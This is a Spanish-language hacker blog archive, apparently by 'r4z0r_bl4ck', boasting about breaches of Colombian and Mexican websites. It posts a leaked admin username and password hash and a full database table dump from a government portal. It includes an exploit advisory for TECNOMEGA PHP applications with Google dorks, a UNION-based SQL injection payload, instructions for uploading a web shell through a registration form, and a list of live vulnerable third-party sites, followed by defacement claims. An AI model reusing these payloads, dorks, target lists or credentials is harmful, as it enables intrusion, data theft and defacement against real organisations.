Archivo de la etiqueta: pwned

santarsicio.edu.co 0wn3d by r4z0r [dataleaks]

pwned-300x224

TARGET: http://santarsicio.edu.co

DB: coleg13_descargas

TABLA USERS: usuarios

COLUMNAS:

user: admin2011
pass: 82cee366389f4b1b4ec74930db75a2bc

#happyhacking

#inside0utside

#colombian cyber army

#r4z0r_bl4ck

www.cali.gov.co #HACKED by @r4z0r_bl4ck

Pues bien….. esta ves el turno fue para la alcaldia municipal de la ciudad de santiago de cali – colombia.

despues de explorar y mapear las secciones del portal me he encontrado con una combinacion de parametros que al colocar un caracter no valido, arroja un error de SQL

verimg:
cali.gov.co hacked

PUES BIEN, REVISANDO LOS ANTECEDENTES EN GOOGLE SALE QUE ESTE PORTAL YA HA SIDO PENETRADO POR SECTOR_404 DE COLOMBIA, REALIZANDO UNA PUBLICACION, PERO AUN NO SE REPORTA UN DEFACE COMO TAL AL INDEX PRINCIPAL NI MUCHO MENOS UN REGISTRO EN ZONE-H, SIN SABER SI HAN ENTRADO POR LA MISMA VULNERABILIDAD QUE MUESTRO EN SU DB.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-# DB NAME #-
caligovco

-# TABLAS #-

tn_album_cat
tn_album_img
tn_banners
tn_banners_camp
tn_banners_stats
tn_banners_xcom
tn_bloque
tn_calen_categ
tn_calen_evento
tn_calendario_eventos
tn_citas_calis
tn_citas_citas
tn_citas_config
tn_citas_intentos
tn_coment_pub
tn_contac_config
tn_contac_lst
tn_contac_msg
tn_dias_festivos
tn_dir_categoria
tn_dir_cattelefonico
tn_dir_permisos
tn_dir_permisosAdmin
tn_dir_telefonico
tn_docs_docs
tn_enc_info
tn_enc_preguntas
tn_faq_categorias
tn_faq_permisos
tn_faq_respuestas
tn_foros_categorias
tn_foros_comentarios
tn_foros_permisos
tn_frm_fields
tn_frm_fieldset
tn_frm_form
tn_frm_perms
tn_frm_values
tn_frm_vot
tn_frm_votCampo1
tn_frm_votCampo2
tn_gal_perms
tn_galeria_categorias
tn_galeria_files
tn_glosario_terminos
tn_grupos_bloques
tn_grupos_comu
tn_grupos_gmember
tn_grupos_lst
tn_grupos_permsMod
tn_module_vars
tn_modulos
tn_not_config
tn_not_conte
tn_not_index
tn_pub_archh
tn_pub_archm
tn_pub_archn
tn_pub_grp
tn_pub_metas
tn_pub_obseh
tn_pub_obsem
tn_pub_obsen
tn_pub_perms
tn_pub_permsFile
tn_pub_procs
tn_pub_publh
tn_pub_publm
tn_pub_publn
tn_pub_stats
tn_pub_temas
tn_pub_tuser
tn_pub_user
tn_pub_usrg
tn_punt_rango
tn_punt_valoracion
tn_realm1
tn_realm4
tn_reg_campo1
tn_reg_campo2
tn_reg_config
tn_reg_usuarios
tn_session_info
tn_sil_catUbis
tn_sil_categorias
tn_sil_comunas
tn_sil_ubis
tn_sil_ubisObservaciones
tn_stats_comu
tn_stats_contar
tn_stats_fecha
tn_stats_hocom
tn_stats_hora
tn_stats_mes
tn_stats_refer
tn_stats_semana
tn_sv_asuntos
tn_sv_comentarios
tn_sv_config
tn_sv_mensajes
tn_sv_organigrama
tn_sv_plogvencidas
tn_sv_user
tn_sx_ayudas
tn_sx_cliente
tn_sx_cliente_comu
tn_sx_cliente_mod
tn_sx_configEditor
tn_sx_distribuidor
tn_sx_fieldSet
tn_sx_files
tn_sx_modulos
tn_sx_session
tn_sx_sessionCheck
tn_sx_sessionLog
tn_sx_vars
tn_tramites_comentarios
tn_tramites_dependencias
tn_tramites_gruposInt
tn_tramites_info
tn_tramites_permisos
tn_tramites_subtemas
tn_tramites_subtemasRel
tn_tramites_temas
tn_tramites_tramGrpInt
tn_tramites_tramites
tn_tramites_visitas
tn_user_bloquePerms
tn_user_comunPerms
tn_user_gmember
tn_user_gperms
tn_user_groups
tn_user_lst
tn_user_permsMod
tn_user_temas
tn_user_temaspref
tn_usr_frg
tn_valorizacion_ciudades
tn_valorizacion_departamentos
tn_valorizacion_descarga_pazysalvos
tn_valorizacion_factura_linea
tn_valorizacion_logs
tn_valorizacion_notarios
tn_valorizacion_pazysalvo
tn_valorizacion_pazysalvo_old
vtm_content
vtm_fce
vtm_page
vtm_page_header
vtm_setup
vtm_template
vtm_template_header
vtm_url_base
vtm_vendor_header

-# END # –

by @r4z0r_bl4ck

TECNOMEGA / SQL Injection vulnerability & Shell Upload

# Exploit Title: TECNOMEGA / SQL Injection vulnerability & Shell Upload
# Date: 21/02/2013
# Exploit Author: Diego_Asencio || r4z0r_bl4ck
# Twitter: @r4z0r_bl4ck
# Blog: https://r4z0rbl4ck.wordpress.com/
# Vendor Homepage: http://www.tecnomega.net/
# Tested on: Linux Ubuntu
# Categoria: WebApps – PHP
# Google Dork: inurl:.php?id= intext:Desarrollado por TECNOMEGA || inurl:registrarme.php intext:Desarrolado por TECNOMEGA
# WorkGroup: @inside0utside

-= INFORMACION =-

La Empresa Digital TECNOMEGA desarrolla aplicaciones web en lenguaje PHP, en el cual no tienen en cuenta el filtrado de variables, ni el filtrado de extenciones de archivos en los ‘uploads’ o subidores de archivos, permitiendo a un atacante subir su phpshell por medio de un formulario de registro de usuario normal, o realizando la inyeccion de SQL para obtener los datos del usuario administrador

-= MYSQL ERROR =-

Error
SELECT * FROM productos WHERE marca=’1” AND estado=’1′ ORDER BY nombre ASC limit 0,16
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘1’ ORDER BY nombre ASC limit 0,16′ at line 1

-= XPL (PoC) =-

1) => http://127.0.0.1/*.php?id=1+union+all+select+0,1,2,3,4– [SQL Injection]

2) => http://127.0.0.1/registrarme.php [Shell Upload]

-= DEMO’s =-

http://itouch.com.co/detalle-accesorio.php?id=362 (SQLi)
http://www.revistacolombianadesaludocupacional.co/autor-detalle.php?id=49 (SQLi)
http://tecnomega.net/productos-marcas.php?id=15 (SQLi)
http://www.unilibrecali.edu.co/Revista_Colombiana_Salud_Ocupacional/autor-detalle.php?id=42 (SQLi)
http://dkrinmobiliaria.com/detalle_inmueble.php?id=36 (SQLi)
http://megatec.com.co/noticias.php?id=9 (SQLi)
http://www.computiendaelectronica.com/detalle_producto.php?id=189 (SQLi)

=> Asi Mismo, para subir shell el dominio seria el mismo, pero con el directorio /registrarme.php donde en el campo para subir la foto de perfil, se colara la WebShell en el servidor por no filtrar extenciones en los formularios de uploads

#################################
Agradecimientos a:

@inside0utside – t34m /
– all members

@R4z0r_Bl4ck
@Sr_Xaoc
@MaximusWell
@MikeSoft
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

excelenciagastronomica.mx #HACKED by @r4z0r_bl4ck

excelenciagastronomica

http://www.excelenciagastronomica.mx

http://www.zone-h.org/mirror/id/19337124

efectoclave.com.mx #HACKED by @r4z0r_bl4ck

efectoclave

http://efectoclave.com.mx

http://www.zone-h.org/mirror/id/19337113

www.colchonescarreiro.com.mx/test.php #HACKED by @r4z0r_bl4ck

colchonescarreiro

http://www.colchonescarreiro.com.mx/test.php

http://www.zone-h.org/mirror/id/19337094

2rest.mx #HACKED by @r4z0r_bl4ck

2rest-mx

http://2rest.mx/

http://www.zone-h.org/mirror/id/19336990